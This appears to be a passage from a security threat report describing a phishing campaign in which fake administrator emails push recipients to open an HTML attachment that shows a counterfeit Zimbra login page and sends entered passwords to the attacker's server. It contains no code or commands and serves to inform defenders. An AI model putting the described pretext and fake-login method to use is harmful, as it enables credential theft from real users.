In these phishing emails, the attackers impersonate the victim organization’s administrator and inform the recipient that their email server is scheduled for an update. The email claims that this update could lead to inbox inaccessibility or even termination. To prevent this, the victim is instructed to open an HTML attachment for further instructions.
The attachment, however, does not contain any instructions. Instead, it presents a fake Zimbra login page with the victim’s username prefilled. If the user enters their password, it is sent to the attacker’s server via an HTTPS POST request.
